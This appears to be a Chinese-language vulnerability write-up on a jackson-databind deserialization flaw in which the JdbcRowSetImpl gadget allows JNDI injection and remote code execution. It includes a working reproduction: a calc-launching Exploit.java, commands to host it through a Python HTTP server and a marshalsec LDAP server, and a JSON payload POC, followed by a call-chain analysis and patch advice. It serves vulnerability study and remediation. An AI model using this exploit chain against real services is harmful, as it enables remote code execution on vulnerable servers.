影响范围
-
jackson-databind before 2.9.10.4
-
jackson-databind before 2.8.11.6
-
jackson-databind before 2.7.9.7
漏洞类型
JDNI注入导致RCE
利用条件
-
开启enableDefaultTyping()
-
使用了com.nqadmin.rowset.JdbcRowSetImpl第三方依赖
漏洞概述
com.nqadmin.rowset.JdbcRowSetImpl类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。
漏洞复现
环境搭建
Step 1:新建Meaven项目:
Step 2:修改pom.xml,添加以下依赖
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.10.4</version>
</dependency>
<!-- https://mvnrepository.com/artifact/com.pastdev.httpcomponents/configuration -->
<dependency>
<groupId>com.nqadmin.rowset</groupId>
<artifactId>jdbcrowsetimpl</artifactId>
<version>1.0.1</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-nop</artifactId>
<version>1.7.2</version>
</dependency>
<!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>
</dependencies>
漏洞利用
这里使用LDAP的利用方式进行漏洞的利用演示,RMI的方式也是类似的,且RMI比LDAP要对JDK版本有很大的局限性~
LDAP利用方式:jdk版本:JDK 11.0.1、8u191、7u201、6u211之前,笔者这里采用JDK 1.8.0_181
编译Exploit.java
Exploit.java代码如下:
import java.lang.Runtime;
public class Exploit {
static {
try {
Runtime.getRuntime().exec(\\\"calc\\\");
} catch (Exception e) {
e.printStackTrace();
}
}
}
编译Exploit.java文件:
搭建HTTP服务
使用Python搭建简易SimpleHTTPServer服务:
python -m SimpleHTTPServer 4444
搭建LDAP服务
使用marshalsec来启动一个LDAP服务:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:4444/#Exploit 1099
执行漏洞POC
Poc.java代码如下所示:
import com.fasterxml.jackson.databind.ObjectMapper;
public class POC {
public static void main(String[] args) throws Exception {
String payload = \\\"[\\\\\\\"com.nqadmin.rowset.JdbcRowSetImpl\\\\\\\",{\\\\\\\"dataSourceName\\\\\\\":\\\\\\\"ldap://127.0.0.1:1099/Exploit\\\\\\\",\\\\\\\"autoCommit\\\\\\\":\\\\\\\"true\\\\\\\"}]\\\";
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.readValue(payload, Object.class);
}
}
之后运行该程序,成功执行命令,弹出计算器:
漏洞分析
首先定位到com.nqadmin.rowset.JdbcRowSetImpl类,之后根据POC全局搜索dataSourceName,发现在setDataSourceName处调用,此时我们的DataSourceName因为没有进行初始化所以当前为null,之后进入else中调用父类的setDataSourceName函数,之后继续跟进:
可以看到在父类的setDataSourceName中只是对dataSource进行了赋值而已,并无其他的操作,那么如何导致的RCE呢?带着疑问我们来看payload中的第二个参数:
第二个参数提供了一个autoCommit,之后全局搜索autoCommit发现在setautoCommit处被调用,而此时的conn未被初始化所以为null,进而进入else语句中,之后会执行一次this.connect(),下面我们跟进来看看:
之后在this.connect中发现一处可疑的JNDI注入,而此时的参数为\\”this.getDataSourceName\\”:
该参数来自我们刚刚设置的DataSourceName,进而此处的JNDI注入参数可控,可以利用实现RCE:
整个利用链如下所示:
mapper.readValue
->com.nqadmin.rowset.JdbcRowSetImpl.setDataSourceName
->javax.sql.rowset.BaseRowSet.setDataSourceName
->com.nqadmin.rowset.JdbcRowSetImpl.setAutoCommit
->this.connect()
->(DataSource)ctx.lookup(this.getDataSourceName())
修复建议
-
及时将jackson-databind升级到安全版本
-
升级到较高版本的JDK
原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34305.html